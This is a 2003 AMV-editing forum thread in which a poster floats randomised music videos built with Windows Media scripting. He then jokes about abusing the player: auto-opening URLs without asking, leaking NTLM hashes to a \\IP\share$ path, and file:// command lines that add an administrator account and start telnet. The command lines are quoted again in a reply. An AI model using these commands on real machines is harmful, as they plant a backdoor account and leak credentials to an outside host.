Idea: Releasing a dynamically generated AMV.

General discussion of Anime Music Videos
danielwang
Village Idiot
Org Profile

Idea: Releasing a dynamically generated AMV.

Post by danielwang » Fri Aug 08, 2003 4:05 am

Ever had a time where you have two pieces of footage that perfectly fit that segment of the song? Had to pick just one?

Why not release a dynamically generated AMV?

Well, you're saying, MPEG-1 and other formats are practically static, and Real Helix mainly supports HTML and scripted playing. But that's why you're go use Windows Media 9 Series for this project...

Split the file up in segments and have them dynamically generated from a script. You can use a ASX random symbol for selecting randomly whether to use Clip A or Clip B, or you can generate an algorithm that rotates the video slowly. How to do algorithm? Windows Media can write file playback counts to a local file or server.

If you're using a server, it's even easier. Just use an stream wrapper, which is the same shell they use for interstitial advertisements. On-demand or station doesn't matter, point it to a static ASX source. If you're writing rotational algorithms for this one, most WMP clients send a serial number. You can even use IP logging!

I'm still trying to figure out how to do this in a single static file or MPEG using WMV metaembedded scripting. So far, I've been able to do seek to a point in the video and a random function, which needs to be integrated.

I also figured out how to make the WMP client open a URL when it's done playing the file. YAY making the user visit my boring website, and it's AUTOMATIC AND DOESN'T ASK! Isn't Microsoft great?

Next stop: Embedding macro viruses in my next AMV to send the user's NTLM hashes when done playing :). There should be a read file function somewhere... Microsoft always puts one in dammit!
<a href="http://www.animetheory.com/" title="AnimeTheory" class="gensmall">AnimeTheory.</a>
<a href="http://www.animemusicvideos.org/search/ ... %20park%22" title="Seach videos NOT by danielwang" class="gen">Make sure you don't download videos that suck!</a>

danielwang
Village Idiot
Org Profile

Post by danielwang » Fri Aug 08, 2003 4:08 am

I forgot to add...

To ensure that your file is able to playback without wrapper script, put one version (default) of your AMV first, then after the trailer add 30 seconds of blank silence which compresses quite easily with Windows Media X). Then have the wrapper do a random funtion to generate an integer.... based on the integer seek to timepoint. I haven't figure out how to do random seeks yet, ttyl.
<a href="http://www.animetheory.com/" title="AnimeTheory" class="gensmall">AnimeTheory.</a>
<a href="http://www.animemusicvideos.org/search/ ... %20park%22" title="Seach videos NOT by danielwang" class="gen">Make sure you don't download videos that suck!</a>

AbsoluteDestiny
Org Profile

Post by AbsoluteDestiny » Fri Aug 08, 2003 4:19 am

just make a normal video or something

ack... the madness of it all

Dannywilson
Org Profile

Re: Idea: Releasing a dynamically generated AMV.

Post by Dannywilson » Fri Aug 08, 2003 5:41 am

danielwang wrote:I also figured out how to make the WMP client open a URL when it's done playing the file. YAY making the user visit my boring website, and it's AUTOMATIC AND DOESN'T ASK! Isn't Microsoft great?
Do that and I'll beat the holy hell out of you if I ever see you.
"in the morning when i have wood..i like to walk around my house and bump random shit with it.... " -Random comment on grouphug.us

danielwang
Village Idiot
Org Profile

Post by danielwang » Fri Aug 08, 2003 9:05 am

Dannywilson wrote:
danielwang wrote:I also figured out how to make the WMP client open a URL when it's done playing the file. YAY making the user visit my boring website, and it's AUTOMATIC AND DOESN'T ASK! Isn't Microsoft great?
If I tell it to go to \\(my IP address\share$, it'll transmit your NTLM hashes as well. Oh nevermind, I can always do a file:// or about:// to run local scripts from the Player.
file://%HOMEPATH%\%WINDOWS%\net user ASPNET aspnet /add
file://%HOMEPATH%\%WINDOWS%\net loclagroup Administrators ASPNET /add
file://%HOMEPATH%\%WINDOWS%\net start telnet
\\My IP Address\SpecialShare$
about:<script>while(1) { alert('I ROOTED YOUR BOX!'); }</script>

LOL!

I'm writing an AVISynth script now to switch the two choruses in "Euphira" using the AlignedSplice and Trim functions.

Tab.
Org Profile

Post by Tab. » Fri Aug 08, 2003 9:13 am

Your ideas are too radical and advanced. YOU MUST BE DESTROYED.
BAN HIM.
◔ ◡ ◔

Dannywilson
Org Profile

Post by Dannywilson » Fri Aug 08, 2003 9:53 am

danielwang wrote:
Dannywilson wrote:
If I tell it to go to \\(my IP address\share$, it'll transmit your NTLM hashes as well. Oh nevermind, I can always do a file:// or about:// to run local scripts from the Player.
file://%HOMEPATH%\%WINDOWS%\net user ASPNET aspnet /add
file://%HOMEPATH%\%WINDOWS%\net loclagroup Administrators ASPNET /add
file://%HOMEPATH%\%WINDOWS%\net start telnet
\\My IP Address\SpecialShare$
about:<script>while(1) { alert('I ROOTED YOUR BOX!'); }</script>

LOL!

I'm writing an AVISynth script now to switch the two choruses in "Euphira" using the AlignedSplice and Trim functions.
Ahh so he fancies himself a telnet man. If you ever did get through my firewalls, past the honeypot fileserver, and onto my actual main editing/sub-storage box I would shoot you in the kneecaps, and then take you for a ride to the "Hospital", where you would be beaten relentlessly by 12 year old retarded schoolgirls wearing bicycle helmets. Unless your into that sorta thing, they your in for a world of pain, ala listening to the Dub of C-ko screaming for 36 hours straight.
"in the morning when i have wood..i like to walk around my house and bump random shit with it.... " -Random comment on grouphug.us

Zarxrax
Org Profile

Post by Zarxrax » Fri Aug 08, 2003 10:16 am

I've had this idea before. As well as idea for an interactive amv with the viewers involvement. I never came up with any means of implementing either though (nor did i really care).

priuscomet
Org Profile

Post by priuscomet » Fri Aug 08, 2003 11:26 am

AbsoluteDestiny wrote:.....

just make a normal video or something

ack... the madness of it all
::sways:: @_@ indeed.....

hey..0-o but it is a fairly interesting idea....:P would (probably) save a heck of a lot of space as opposed to doing 2 versions (or three) of the same video. XD

Return to “General AMV”